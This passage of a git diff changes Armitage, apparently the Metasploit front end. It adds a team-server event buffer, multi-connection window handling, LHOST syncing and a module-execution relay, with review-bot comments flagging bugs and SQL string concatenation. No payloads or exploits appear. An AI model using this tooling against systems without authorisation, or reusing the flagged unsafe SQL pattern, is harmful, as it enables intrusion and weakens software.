encoding => "base64")); - } - release($poll_lock); - + $rv = result(%(data => [$events get: $eid], encoding => "base64", prompt => "$eid $+ > ")); + writeObject($handle, $rv); + } + else if ($method eq "armitage.lusers") { + $rv = [new HashMap]; + [$rv put: "lusers", [$events clients]]; writeObject($handle, $rv); } else if ($method eq "armitage.append") { @@ -308,6 +293,10 @@ sub client { $response = [$client execute: $method, cast($args, ^Object)]; writeObject($handle, $response); } + else if ($method eq "module.execute_direct") { + $response = [$client execute: "module.execute", cast($args, ^Object)]; + writeObject($handle, $response); + } else if ($method in %async) { if ($args) { [$client execute_async: $method, cast($args, ^Object)]; @@ -333,6 +322,7 @@ sub client { if ($eid !is $null) { event("*** $eid left.\n"); + [$events free: $eid]; } # reset the user's filter... 
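Review bot: In the `armitage.push` branch the loop iterates `$temp` over the split lines, but each iteration stores `$data`, so a multi-line push lands in the event buffer once per line, in full. Store the loop variable instead, e.g. `[$events put: formatDate("HH:mm:ss") . " < $+ $[10]eid $+ > " . $temp . "\n"];`, or drop the loop and put `$data` once. The removed `push(@events, ...)` line had the same pattern, so this is carried over rather than introduced here. The enclosing `client` sub starts and ends outside the hunk.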
@@ -355,7 +345,7 @@ sub client { sub main { global('$client $mclient'); - local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle $console'); + local('$server %sessions $sess_lock $read_lock $lock_lock %locks %readq $id $error $auth %cache $cach_lock $client_cache $handle $console $events'); $auth = unpack("H*", digest(rand() . ticks(), "MD5"))[0]; @@ -413,10 +403,12 @@ sub main { # $sess_lock = semaphore(1); $read_lock = semaphore(1); - $poll_lock = semaphore(1); $lock_lock = semaphore(1); $cach_lock = semaphore(1); + # setup any shared buffers... + $events = [new armitage.ArmitageBuffer: 250]; + # set the LHOST to whatever the user specified (use console.write to make the string not UTF-8) $console = createConsole($client); call($client, "console.write", $console, "setg LHOST $host $+ \n"); @@ -424,6 +416,9 @@ sub main { # absorb the output of this command which is LHOST => ... call($client, "console.read", $console); + # update server's understanding of this value... + call($client, "armitage.set_ip", $host); + # # create a thread to push console messages to the event queue for all clients. # @@ -433,12 +428,10 @@ sub main { sleep(2000); $r = call($client, "console.read", $console); if ($r["data"] ne "") { - acquire($poll_lock); - push(@events, formatDate("HH:mm:ss") . " " . $r["data"]); - release($poll_lock); + [$events put: formatDate("HH:mm:ss") . " " . $r["data"]]; } } - }, \$client, \$poll_lock, \@events, \$console); + }, \$client, \$events, \$console); # # Create a shared hash that contains a thread for each session... 
@@ -535,7 +528,7 @@ service framework-postgres start"); $handle = [$server accept]; if ($handle !is $null) { %readq[$id] = %(); - fork(&client, \$client, \$handle, \%sessions, \$read_lock, \$sess_lock, \$poll_lock, $queue => %readq[$id], \$id, \@events, \$auth, \%locks, \$lock_lock, \$cach_lock, \%cache, \$motd, \$client_cache, $_user => $user, $_pass => $pass); + fork(&client, \$client, \$handle, \%sessions, \$read_lock, \$sess_lock, $queue => %readq[$id], \$id, \$events, \$auth, \%locks, \$lock_lock, \$cach_lock, \%cache, \$motd, \$client_cache, $_user => $user, $_pass => $pass); $id++; } diff --git a/external/source/armitage/scripts/targets.sl b/external/source/armitage/scripts/targets.sl index 3721006ea7d3..797174c255d2 100644 --- a/external/source/armitage/scripts/targets.sl +++ b/external/source/armitage/scripts/targets.sl @@ -193,6 +193,11 @@ on hosts { $address = $host['address']; if ($address in %hosts && size(%hosts[$address]) > 1) { %newh[$address] = %hosts[$address]; + + # set the label to empty b/c team server won't add labels if there are no labels. This fixes + # a corner case where a user might clear all labels and find they won't go away + %newh[$address]['label'] = ''; + putAll(%newh[$address], keys($host), values($host)); if ($host['os_name'] eq "") { @@ -262,7 +267,7 @@ sub _importHosts { } $console = createDisplayTab("Import", $file => "import"); - [$console addCommand: $null, "db_import " . strrep(join(" ", $files), "\\", "\\\\")]; + [$console addCommand: 'x', "db_import " . strrep(join(" ", $files), "\\", "\\\\")]; [$console addListener: lambda({ elog("imported hosts from $success file" . iff($success != 1, "s")); }, \$success)]; 
@@ -346,8 +351,10 @@ sub clearHostFunction { } sub clearDatabase { - elog("cleared the database"); - call_async($mclient, "db.clear"); + if (!askYesNo("This action will clear the database. You will lose all information\ncollected up to this point. You will not be able toget it back.\nWould you like to clear the database?", "Clear Database")) { + elog("cleared the database"); + call_async($mclient, "db.clear"); + } } # called when a target is clicked on... diff --git a/external/source/armitage/scripts/util.sl b/external/source/armitage/scripts/util.sl index de80e1d8d343..b226c1edc280 100644 --- a/external/source/armitage/scripts/util.sl +++ b/external/source/armitage/scripts/util.sl @@ -151,6 +151,11 @@ sub createConsoleTab { } sub setg { + # update team server's understanding of LHOST + if ($1 eq "LHOST") { + call_async($client, "armitage.set_ip", $2); + } + %MSF_GLOBAL[$1] = $2; local('$c'); $c = createConsole($client); @@ -381,7 +386,7 @@ sub connectDialog { $msfrpc_handle = $null; } - local('$dialog $host $port $ssl $user $pass $button $cancel $start $center $help $helper'); + local('$dialog $host $port $ssl $user $pass $button $start $center $help $helper'); $dialog = window("Connect...", 0, 0); # setup our nifty form fields.. @@ -398,8 +403,6 @@ sub connectDialog { $help = [new JButton: "Help"]; [$help setToolTipText: "<html>Use this button to view the Getting Started Guide on the Armitage homepage</html>"]; - $cancel = [new JButton: "Exit"]; - # lay them out $center = [new JPanel]; @@ -422,9 +425,14 @@ sub connectDialog { ($h, $p, $u, $s) = @o; [$dialog setVisible: 0]; - connectToMetasploit($h, $p, $u, $s); if ($h eq "127.0.0.1" || $h eq "::1" || $h eq "localhost") { + if ($__frame__ && [$__frame__ checkLocal]) { + showError("You can't connect to localhost twice"); + [$dialog setVisible: 1]; + return; + } + try { closef(connect("127.0.0.1", $p, 1000)); } 
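Review bot: The new confirmation prompt in `clearDatabase` contains a typo, `able toget it back`, and the guard `if (!askYesNo(...))` reads as though the database is cleared when the user declines. `askYesNo` is defined outside this hunk; if it returns the JOptionPane option code, where Yes is 0, the negation is correct but deserves a comment such as `# askYesNo returns 0 when the user picks "Yes"`. The string should read `You will not be able to get it back.`.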
@@ -434,37 +442,33 @@ sub connectDialog { } } } + + connectToMetasploit($h, $p, $u, $s); }, \$dialog, \$host, \$port, \$user, \$pass)]; [$help addActionListener: gotoURL("http://www.fastandeasyhacking.com/start")]; - [$cancel addActionListener: { - [System exit: 0]; - }]; - [$dialog pack]; [$dialog setLocationRelativeTo: $null]; [$dialog setVisible: 1]; } -sub _elog { +sub elog { + local('$2'); if ($client !is $mclient) { + # $2 can be NULL here. team server will populate it... call_async($mclient, "armitage.log", $1, $2); } else { + # since we're not on a team server, no one else will have + # overwritten LHOST, so we can trust $MY_ADDRESS to be current + if ($2 is $null) { + $2 = $MY_ADDRESS; + } call_async($client, "db.log_event", "$2 $+ //", $1); } } -sub elog { - local('$2'); - if ($2 is $null) { - $2 = $MY_ADDRESS; - } - - _elog($1, $2); -} - sub module_execute { return invoke(&_module_execute, filter_data_array("user_launch", @_)); } diff --git a/external/source/armitage/src/armitage/ArmitageApplication.java b/external/source/armitage/src/armitage/ArmitageApplication.java index b7365e1309ab..84fe420c76c7 100644 --- a/external/source/armitage/src/armitage/ArmitageApplication.java +++ b/external/source/armitage/src/armitage/ArmitageApplication.java 
@@ -13,13 +13,32 @@ import ui.*; -public class ArmitageApplication extends JFrame { +public class ArmitageApplication extends JComponent { protected JTabbedPane tabs = null; protected JSplitPane split = null; protected JMenuBar menus = new JMenuBar(); protected ScreenshotManager screens = null; protected KeyBindings keys = new KeyBindings(); protected MenuBuilder builder = null; + protected String title = ""; + protected MultiFrame window = null; + + public KeyBindings getBindings() { + return keys; + } + + public void setTitle(String title) { + this.title = title; + window.setTitle(this, title); + } + + public String getTitle() { + return title; + } + + public void setIconImage(Image blah) { + window.setIconImage(blah); + } public void setScreenshotManager(ScreenshotManager m) { screens = m; @@ -192,7 +211,7 @@ public void popAppTab(Component tab) { /* pop goes the tab! */ final JFrame r = new JFrame(t.title); - r.setIconImages(getIconImages()); + //r.setIconImages(getIconImages()); r.setLayout(new BorderLayout()); r.add(t.component, BorderLayout.CENTER); r.pack(); @@ -366,8 +385,20 @@ public void componentShown(ComponentEvent ev) { component.requestFocusInWindow(); } - public ArmitageApplication() { + public void touch() { + Component c = tabs.getSelectedComponent(); + if (c == null) + return; + + if (c instanceof Activity) + ((Activity)c).resetNotification(); + + c.requestFocusInWindow(); + } + + public ArmitageApplication(MultiFrame f, String details, msf.RpcConnection conn) { super(); + window = f; tabs = new DraggableTabbedPane(); setLayout(new BorderLayout()); @@ -383,10 +414,8 @@ public ArmitageApplication() { /* add our tabbed pane */ add(split, BorderLayout.CENTER); - /* setup our key bindings */ - KeyboardFocusManager.getCurrentKeyboardFocusManager().addKeyEventDispatcher(keys); - /* ... */ - setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); + //setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); + ((ui.MultiFrame)window).addButton(details, this, conn); } } 
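Review bot: `setTitle` and `setIconImage` in `ArmitageApplication` dereference `window` without a null check, while `ArmitageMain.main` in this same commit passes a `null` frame in server mode. If an `ArmitageApplication` can never be built in server mode, say so in a comment on the constructor, e.g. `/* f must be non-null: GUI mode only */`. The two lines that were commented out rather than removed (`//r.setIconImages(getIconImages());` and `//setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);`) should be deleted or given a reason. The cast in `((ui.MultiFrame)window).addButton(...)` is redundant because `window` is already declared as `MultiFrame`.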
diff --git a/external/source/armitage/src/armitage/ArmitageBuffer.java b/external/source/armitage/src/armitage/ArmitageBuffer.java new file mode 100644 index 000000000000..22731f671f3f --- /dev/null +++ b/external/source/armitage/src/armitage/ArmitageBuffer.java 
@@ -0,0 +1,138 @@ +package armitage; + +import java.util.*; + +/* + * Implement a thread safe store that any client may write to and + * any client may read from (keeping track of their cursor into + * the console) + */ +public class ArmitageBuffer { + private static final class Message { + public String message = null; + public Message next = null; + } + + /* store our messages... */ + public Message first = null; + public Message last = null; + public long size = 0; + public long max = 0; + public String prompt = ""; + + /* store indices into this buffer */ + public Map indices = new HashMap(); + + /* setup the buffer?!? :) */ + public ArmitageBuffer(long max) { + this.max = max; + } + + /* store a prompt with this buffer... we're not going to do any indexing magic for now */ + public String getPrompt() { + synchronized (this) { + return prompt; + } + } + + /* set the prompt */ + public void setPrompt(String text) { + synchronized (this) { + prompt = text; + } + } + + /* post a message to this buffer */ + public void put(String text) { + synchronized (this) { + /* create our message */ + Message m = new Message(); + m.message = text; + + /* store our message */ + if (last == null && first == null) { + first = m; + last = m; + } + else { + last.next = m; + last = m; + } + + /* increment number of stored messages */ + size += 1; + + /* limit the total number of past messages to the max size */ + if (size > max) { + first = first.next; + } + } + } + + /* retrieve a set of all clients consuming this buffer */ + public Collection clients() { + synchronized (this) { + LinkedList clients = new LinkedList(indices.keySet()); + return clients; + } + } + + /* free a client */ + public void free(String id) { + synchronized (this) { + indices.remove(id); + } + } + + /* reset our indices too */ + public void reset() { + synchronized (this) { + first = null; + last = null; + indices.clear(); + size = 0; + } + } + + /* retrieve all messages available to the client (if any) */ + 
public String get(String id) { + synchronized (this) { + /* nadaz */ + if (first == null) + return ""; + + /* get our index into the buffer */ + Message index = null; + if (!indices.containsKey(id)) { + index = first; + } + else { + index = (Message)indices.get(id); + + /* nothing happening */ + if (index.next == null) + return ""; + + index = index.next; + } + + /* now let's walk through it */ + StringBuffer result = new StringBuffer(); + Message temp = index; + while (temp != null) { + result.append(temp.message); + index = temp; + temp = temp.next; + } + + /* store our index */ + indices.put(id, index); + + return result.toString(); + } + } + + public String toString() { + return "[" + size + " messages]"; + } +} diff --git a/external/source/armitage/src/armitage/ArmitageMain.java b/external/source/armitage/src/armitage/ArmitageMain.java index 3feb310ee081..eb8d8295c219 100644 --- a/external/source/armitage/src/armitage/ArmitageMain.java +++ b/external/source/armitage/src/armitage/ArmitageMain.java @@ -9,10 +9,10 @@ import sleep.parser.ParserConfig; import java.util.*; - import java.io.*; import cortana.core.*; +import ui.*; /** * This class launches Armitage and loads the scripts that are part of it. @@ -101,7 +101,7 @@ protected String[] getServerScripts() { }; } - public ArmitageMain(String[] args) { + public ArmitageMain(String[] args, MultiFrame window, boolean serverMode) { /* tweak the parser to recognize a few useful escapes */ ParserConfig.installEscapeConstant('c', console.Colors.color + ""); ParserConfig.installEscapeConstant('U', console.Colors.underline + ""); 
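Review bot: In `ArmitageBuffer.put` the trim branch advances `first` but never decrements `size`, so `size` grows without bound and `toString()` reports every message ever posted rather than the number retained; add `size -= 1;` next to `first = first.next;`. A cursor stored in `indices` also keeps every message after it reachable through `next`, so a client id that is never passed to `get` or `free` again pins an ever-growing chain and `max` does not bound memory. Consider expiring idle cursors or snapping a cursor forward to `first` once it falls behind. The state fields are `public` although all access is meant to go through `synchronized` methods; making them `private` would stop callers from bypassing the lock.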
@@ -118,15 +118,6 @@ public ArmitageMain(String[] args) { ScriptLoader loader = new ScriptLoader(); loader.addSpecificBridge(this); - /* check for server mode option */ - boolean serverMode = false; - - int x = 0; - for (x = 0; x < args.length; x++) { - if (args[x].equals("--server")) - serverMode = true; - } - /* setup Cortana event and filter bridges... we will install these into Armitage */ if (!serverMode) { @@ -135,6 +126,7 @@ public ArmitageMain(String[] args) { variables.putScalar("$__events__", SleepUtils.getScalar(events)); variables.putScalar("$__filters__", SleepUtils.getScalar(filters)); + variables.putScalar("$__frame__", SleepUtils.getScalar(window)); loader.addGlobalBridge(events.getBridge()); loader.addGlobalBridge(filters.getBridge()); @@ -142,7 +134,7 @@ public ArmitageMain(String[] args) { /* load the appropriate scripts */ String[] scripts = serverMode ? getServerScripts() : getGUIScripts(); - + int x = -1; try { for (x = 0; x < scripts.length; x++) { InputStream i = this.getClass().getClassLoader().getResourceAsStream(scripts[x]); @@ -161,6 +153,23 @@ public ArmitageMain(String[] args) { } public static void main(String args[]) { - new ArmitageMain(args); + /* check for server mode option */ + boolean serverMode = false; + + int x = 0; + for (x = 0; x < args.length; x++) { + if (args[x].equals("--server")) + serverMode = true; + } + + /* setup our armitage instance */ + if (serverMode) { + new ArmitageMain(args, null, serverMode); + } + else { + MultiFrame.setupLookAndFeel(); + MultiFrame frame = new MultiFrame(); + new ArmitageMain(args, frame, serverMode); + } } } diff --git a/external/source/armitage/src/armitage/EventLogTabCompletion.java b/external/source/armitage/src/armitage/EventLogTabCompletion.java new file mode 100644 index 000000000000..6fa7fddee848 --- /dev/null +++ b/external/source/armitage/src/armitage/EventLogTabCompletion.java 
@@ -0,0 +1,60 @@ +package armitage; + +import console.Console; +import msf.*; +import java.util.*; +import java.awt.*; +import java.awt.event.*; +import javax.swing.*; + +import java.io.IOException; + +public class EventLogTabCompletion extends GenericTabCompletion { + protected RpcConnection connection; + + public EventLogTabCompletion(Console window, RpcConnection connection) { + super(window); + this.connection = connection; + } + + public Collection getOptions(String text) { + try { + Map response = (Map)connection.execute("armitage.lusers", new Object[] {}); + + if (response.get("lusers") == null) + return null; + + Iterator users = ((Collection)response.get("lusers")).iterator(); + + LinkedList options = new LinkedList(); + String word; + String pre; + + if (text.endsWith(" ")) { + word = ""; + pre = text; + } + if (text.lastIndexOf(" ") != -1) { + word = text.substring(text.lastIndexOf(" ") + 1); + pre = text.substring(0, text.lastIndexOf(" ") + 1); + } + else { + word = text; + pre = ""; + } + + while (users.hasNext()) { + String user = users.next() + ""; + if (user.startsWith(word)) { + options.add(pre + user); + } + } + + return options; + } + catch (IOException ioex) { + ioex.printStackTrace(); + } + return null; + } +} diff --git a/external/source/armitage/src/msf/DatabaseImpl.java b/external/source/armitage/src/msf/DatabaseImpl.java index ff00d4d877df..ee58207c2e7d 100644 --- a/external/source/armitage/src/msf/DatabaseImpl.java +++ b/external/source/armitage/src/msf/DatabaseImpl.java 
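Review bot: In `getOptions` the first `if (text.endsWith(" "))` is not chained to the `if`/`else` that follows, so whatever it assigns to `word` and `pre` is always overwritten by the second statement. The result happens to be identical for input ending in a space, which makes the first branch dead code; either delete it or write `else if (text.lastIndexOf(" ") != -1) {` to make the intent explicit. The method also returns `null` both when the reply has no `lusers` entry and after an `IOException`; an empty list would spare callers a null check, provided `GenericTabCompletion` (not visible here) does not rely on `null`.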
@@ -310,13 +310,13 @@ protected Map build() { if (hFilter.indexOf("sessions.") >= 0) tables.add("sessions"); - temp.put("db.hosts", "SELECT DISTINCT hosts.* FROM " + join(tables, ", ") + " WHERE hosts.workspace_id = " + workspaceid + " AND " + hFilter + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (limit1 * hindex)); + temp.put("db.hosts", "SELECT DISTINCT hosts.id, hosts.updated_at, hosts.state, hosts.mac, hosts.purpose, hosts.os_flavor, hosts.os_name, hosts.address, hosts.os_sp FROM " + join(tables, ", ") + " WHERE hosts.workspace_id = " + workspaceid + " AND " + hFilter + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (limit1 * hindex)); } else { - temp.put("db.hosts", "SELECT DISTINCT hosts.* FROM hosts WHERE hosts.workspace_id = " + workspaceid + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (hindex * limit1)); + temp.put("db.hosts", "SELECT DISTINCT hosts.id, hosts.updated_at, hosts.state, hosts.mac, hosts.purpose, hosts.os_flavor, hosts.os_name, hosts.address, hosts.os_sp FROM hosts WHERE hosts.workspace_id = " + workspaceid + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (hindex * limit1)); } - temp.put("db.services", "SELECT DISTINCT services.*, hosts.address as host FROM services, (" + temp.get("db.hosts") + ") as hosts WHERE hosts.id = services.host_id AND services.state = 'open' ORDER BY services.id ASC LIMIT " + limit2 + " OFFSET " + (limit2 * sindex)); + temp.put("db.services", "SELECT DISTINCT services.id, services.name, services.port, services.proto, services.info, services.updated_at, hosts.address as host FROM services, (" + temp.get("db.hosts") + ") as hosts WHERE hosts.id = services.host_id AND services.state = 'open' ORDER BY services.id ASC LIMIT " + limit2 + " OFFSET " + (limit2 * sindex)); temp.put("db.loots", "SELECT DISTINCT loots.*, hosts.address as host FROM loots, hosts WHERE hosts.id = loots.host_id AND hosts.workspace_id = " + workspaceid); temp.put("db.workspaces", "SELECT DISTINCT * FROM 
workspaces"); temp.put("db.notes", "SELECT DISTINCT notes.*, hosts.address as host FROM notes, hosts WHERE hosts.id = notes.host_id AND hosts.workspace_id = " + workspaceid); @@ -412,6 +412,10 @@ else if (methodName.equals("db.clear_cache")) { return new HashMap(); } else if (methodName.equals("db.clear")) { + /* clear our local cache of labels */ + labels = new HashMap(); + + /* clear the database */ executeUpdate( "BEGIN;" + "DELETE FROM hosts;" + diff --git a/external/source/armitage/src/msf/RpcAsync.java b/external/source/armitage/src/msf/RpcAsync.java index c7663ddbcd66..fe0daf7a4e1f 100644 --- a/external/source/armitage/src/msf/RpcAsync.java +++ b/external/source/armitage/src/msf/RpcAsync.java @@ -32,7 +32,7 @@ public Object execute(String methodName, Object[] params) throws IOException { if (methodName.equals("module.info") || methodName.equals("module.options") || methodName.equals("module.compatible_payloads")) { StringBuilder keysb = new StringBuilder(methodName); - for(int i = 1; i < params.length; i++) + for(int i = 0; i < params.length; i++) keysb.append(params[i].toString()); String key = keysb.toString(); diff --git a/external/source/armitage/src/msf/RpcConnectionImpl.java b/external/source/armitage/src/msf/RpcConnectionImpl.java index f7ba43d048db..d784ab17b781 100644 --- a/external/source/armitage/src/msf/RpcConnectionImpl.java +++ b/external/source/armitage/src/msf/RpcConnectionImpl.java 
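Review bot: The rewritten `db.hosts` statements in `build()` still assemble SQL by concatenating `hFilter`, `workspaceid` and the limit/offset values into the query text, and `db.services` embeds that string again as a subquery. How `hFilter` is produced is outside this hunk; if any part of it carries text supplied by a user or a team-server client, those values should be bound through a `PreparedStatement` or checked against an allow-list before they reach this method. A comment on `build()` stating which inputs are trusted would help, e.g. `/* hFilter is generated SQL; every value in it must already be escaped */`. `build()` starts and ends outside the hunk.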
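Review bot: The cache key in `RpcAsync.execute` is now built from all parameters, but they are appended with no separator, so different argument lists can produce the same key (for instance `"ab"`, `"c"` and `"a"`, `"bc"`). Appending a delimiter that cannot occur in a module name, e.g. `keysb.append('\0').append(params[i]);`, removes the ambiguity and also avoids the `NullPointerException` that `params[i].toString()` throws on a null argument. `execute` continues outside the hunk.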
@@ -84,12 +84,40 @@ public Object execute(String methodName) throws IOException { } protected HashMap locks = new HashMap(); + protected String address = ""; + + public String getLocalAddress() { + return address; + } /** Adds token, runs command, and notifies logger on call and return */ public Object execute(String methodName, Object[] params) throws IOException { if (database != null && "db.".equals(methodName.substring(0, 3))) { return database.execute(methodName, params); } + else if (methodName.equals("armitage.ping")) { + try { + long time = System.currentTimeMillis() - Long.parseLong(params[0] + ""); + + HashMap res = new HashMap(); + res.put("result", time + ""); + return res; + } + catch (Exception ex) { + HashMap res = new HashMap(); + res.put("result", "0"); + return res; + } + } + else if (methodName.equals("armitage.my_ip")) { + HashMap res = new HashMap(); + res.put("result", address); + return res; + } + else if (methodName.equals("armitage.set_ip")) { + address = params[0] + ""; + return new HashMap(); + } else if (methodName.equals("armitage.lock")) { if (locks.containsKey(params[0] + "")) { Map res = new HashMap(); diff --git a/external/source/armitage/src/msf/RpcQueue.java b/external/source/armitage/src/msf/RpcQueue.java index ba657c26716b..b56d2a2135a1 100644 --- a/external/source/armitage/src/msf/RpcQueue.java +++ b/external/source/armitage/src/msf/RpcQueue.java @@ -66,7 +66,7 @@ public void run() { Thread.sleep(50); } else { - Thread.sleep(500); + Thread.sleep(200); } } } diff --git a/external/source/armitage/src/table/NetworkTable.java b/external/source/armitage/src/table/NetworkTable.java index 2d7590db0e13..c89bd97dbb87 100644 --- a/external/source/armitage/src/table/NetworkTable.java +++ b/external/source/armitage/src/table/NetworkTable.java 
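Review bot: The new `armitage.set_ip` branch stores `params[0]` in the shared `address` field with no validation, and that value is later returned by `getLocalAddress()` and `armitage.my_ip`. In the same commit `server.sl` uses `getLocalAddress` to fill in the source address of `armitage.log` events, so if team-server clients can reach this method, any one of them can change the address recorded in everyone's log entries; consider validating the value as an IP address or restricting who may set it. Unlike `armitage.ping`, the branch has no protection against an empty `params` array; a guard such as `if (params.length == 0) return new HashMap();` would cover it. `address` is written and read from different threads without synchronization, so it should probably be declared `volatile`.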
@@ -1,11 +1,11 @@ package table; -import javax.swing.*; -import javax.swing.event.*; +import javax.swing.*; +import javax.swing.event.*; import javax.swing.border.*; import javax.swing.table.*; -import java.awt.*; +import java.awt.*; import java.awt.event.*; import java.awt.image.*; @@ -92,7 +92,7 @@ public boolean equals(Object a, Object b) { table.getColumn("Description").setPreferredWidth(500); final TableCellRenderer parent = table.getDefaultRenderer(Object.class); - table.setDefaultRenderer(Object.class, new TableCellRenderer() { + final TableCellRenderer phear = new TableCellRenderer() { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) { JLabel component = (JLabel)parent.getTableCellRendererComponent(table, value, isSelected, false, row, col); @@ -111,9 +111,15 @@ else if (col == 1 && !"".equals(model.getValueAt(table, row, "Description"))) { if (tip.length() > 0) { component.setToolTipText(tip); } + return component; } - }); + }; + + table.getColumn("Address").setCellRenderer(phear); + table.getColumn("Label").setCellRenderer(phear); + table.getColumn("Description").setCellRenderer(phear); + table.getColumn("Pivot").setCellRenderer(phear); table.getColumn(" ").setCellRenderer(new TableCellRenderer() { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) { diff --git a/external/source/armitage/src/ui/MultiFrame.java b/external/source/armitage/src/ui/MultiFrame.java new file mode 100644 index 000000000000..96bea014f1d7 --- /dev/null +++ b/external/source/armitage/src/ui/MultiFrame.java 
@@ -0,0 +1,238 @@ +package ui; + +import javax.swing.*; +import javax.swing.event.*; + +import java.awt.*; +import java.awt.event.*; + +import java.util.*; + +import armitage.ArmitageApplication; +import msf.*; + +/* A class to host multiple Armitage instances in one frame. Srsly */ +public class MultiFrame extends JFrame implements KeyEventDispatcher { + protected JToolBar toolbar; + protected JPanel content; + protected CardLayout cards; + protected LinkedList buttons; + + private static class ArmitageInstance { + public ArmitageApplication app; + public JToggleButton button; + public RpcConnection client; + } + + public Map getClients() { + synchronized (buttons) { + Map r = new HashMap(); + + Iterator i = buttons.iterator(); + while (i.hasNext()) { + ArmitageInstance temp = (ArmitageInstance)i.next(); + r.put(temp.button.getText(), temp.client); + } + return r; + } + } + + public void setTitle(ArmitageApplication app, String title) { + if (active == app) + setTitle(title); + } + + protected ArmitageApplication active; + + /* is localhost running? 
*/ + public boolean checkLocal() { + synchronized (buttons) { + Iterator i = buttons.iterator(); + while (i.hasNext()) { + ArmitageInstance temp = (ArmitageInstance)i.next(); + if ("localhost".equals(temp.button.getText())) { + return true; + } + } + return false; + } + } + + public boolean dispatchKeyEvent(KeyEvent ev) { + if (active != null) { + return active.getBindings().dispatchKeyEvent(ev); + } + return false; + } + + public static final void setupLookAndFeel() { + try { + for (UIManager.LookAndFeelInfo info : UIManager.getInstalledLookAndFeels()) { + if ("Nimbus".equals(info.getName())) { + UIManager.setLookAndFeel(info.getClassName()); + break; + } + } + } + catch (Exception e) { + } + } + + public void closeConnect() { + synchronized (buttons) { + if (buttons.size() == 0) { + System.exit(0); + } + } + } + + public void quit() { + synchronized (buttons) { + ArmitageInstance temp = null; + content.remove(active); + Iterator i = buttons.iterator(); + while (i.hasNext()) { + temp = (ArmitageInstance)i.next(); + if (temp.app == active) { + toolbar.remove(temp.button); + i.remove(); + break; + } + } + + if (buttons.size() == 0) { + System.exit(0); + } + else if (buttons.size() == 1) { + remove(toolbar); + validate(); + } + + if (i.hasNext()) { + temp = (ArmitageInstance)i.next(); + } + else { + temp = (ArmitageInstance)buttons.getFirst(); + } + + set(temp.button); + } + } + + public MultiFrame() { + super(""); + + setLayout(new BorderLayout()); + + /* setup our toolbar */ + toolbar = new JToolBar(); + + /* content area */ + content = new JPanel(); + cards = new CardLayout(); + content.setLayout(cards); + + /* setup our stuff */ + add(content, BorderLayout.CENTER); + + /* buttons?!? :) */ + buttons = new LinkedList(); + + /* do this ... 
*/ + setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); + + /* some basic setup */ + setSize(800, 600); + setExtendedState(JFrame.MAXIMIZED_BOTH); + + /* all your keyboard shortcuts are belong to me */ + KeyboardFocusManager.getCurrentKeyboardFocusManager().addKeyEventDispatcher(this); + } + + protected void set(JToggleButton button) { + synchronized (buttons) { + /* set all buttons to the right state */ + Iterator i = buttons.iterator(); + while (i.hasNext()) { + ArmitageInstance temp = (ArmitageInstance)i.next(); + if (temp.button.getText().equals(button.getText())) { + temp.button.setSelected(true); + active = temp.app; + setTitle(active.getTitle()); + } + else { + temp.button.setSelected(false); + } + } + + /* show our cards? */ + cards.show(content, button.getText()); + active.touch(); + } + } + + public void addButton(String title, final ArmitageApplication component, RpcConnection conn) { + synchronized (buttons) { + final ArmitageInstance a = new ArmitageInstance(); + a.button = new JToggleButton(title); + a.button.setToolTipText(title); + a.app = component; + a.client = conn; + + a.button.addActionListener(new ActionListener() { + public void actionPerformed(ActionEvent ev) { + set((JToggleButton)ev.getSource()); + } + }); + + a.button.addMouseListener(new MouseAdapter() { + public void check(MouseEvent ev) { + if (ev.isPopupTrigger()) { + final JToggleButton source = a.button; + JPopupMenu popup = new JPopupMenu(); + JMenuItem rename = new JMenuItem("Rename"); + rename.addActionListener(new ActionListener() { + public void actionPerformed(ActionEvent ev) { + String name = JOptionPane.showInputDialog("Rename to?", source.getText()); + if (name != null) { + content.remove(component); + content.add(component, name); + source.setText(name); + set(source); + } + } + }); + popup.add(rename); + popup.show((JComponent)ev.getSource(), ev.getX(), ev.getY()); + ev.consume(); + } + } + + public void mouseClicked(MouseEvent ev) { + check(ev); + } + + public void 
mousePressed(MouseEvent ev) { + check(ev); + } + + public void mouseReleased(MouseEvent ev) { + check(ev); + } + }); + + toolbar.add(a.button); + content.add(component, title); + buttons.add(a); + set(a.button); + + if (buttons.size() == 1) { + show(); + } + else if (buttons.size() == 2) { + add(toolbar, BorderLayout.SOUTH); + } + validate(); + } + } +} diff --git a/external/source/armitage/whatsnew.txt b/external/source/armitage/whatsnew.txt index c1e03e579b70..55804871ffbd 100644 --- a/external/source/armitage/whatsnew.txt +++ b/external/source/armitage/whatsnew.txt @@ -1,6 +1,29 @@ Armitage Changelog ================== +12 Feb 13 (tested against msf 16438) +--------- +- Fixed a corner case preventing the display of removed host labels + when connected to a team server. +- Fixed RPC call cache corruption in team server mode. This bug could + lead to some exploits defaulting to a shell payload when meterpreter + was a possibility. +- Slight optimization to some DB queries. I no longer pull unused + fields making the query marginally faster. Team server is more + efficient too as changes to unused fields won't force data (re)sync. +- Hosts -> Clear Database now clears host labels too. +- Added the ability to manage multiple team server instances through + Armitage. Go to Armitage -> New Connection to connect to another + server. A button bar will appear that allows you to switch active + Armitage connections. + - Credentials available across instances are pooled when using + the [host] -> Login menu and the credential helper. +- Rewrote the event log management code in the team server +- Added nickname tab completion to event log. I feel like I'm writing + an IRC client again. +- Hosts -> Clear Database now asks you to confirm the action. +- Hosts -> Import Hosts announces successful import to event log again. + 23 Jan 13 (tested against msf 16351) --------- - Added helpers to set EXE::Custom and EXE::Template options. 
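Review bot: `checkLocal()` reports a local instance only when a toolbar button's text is exactly `"localhost"`, while the caller in `connectDialog` treats `127.0.0.1`, `::1` and `localhost` as local, and the Rename menu added in `addButton` lets the user change that text. The title passed to `addButton` is chosen outside this file, so a locality flag stored on `ArmitageInstance` when the instance is added would make the check independent of the label. `set()` has the same dependency: it matches instances by `getText()` equality, so two buttons given the same name are both marked selected and share one `CardLayout` key. `setupLookAndFeel()` also discards every exception silently; logging in the `catch` would make a failed look-and-feel visible.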
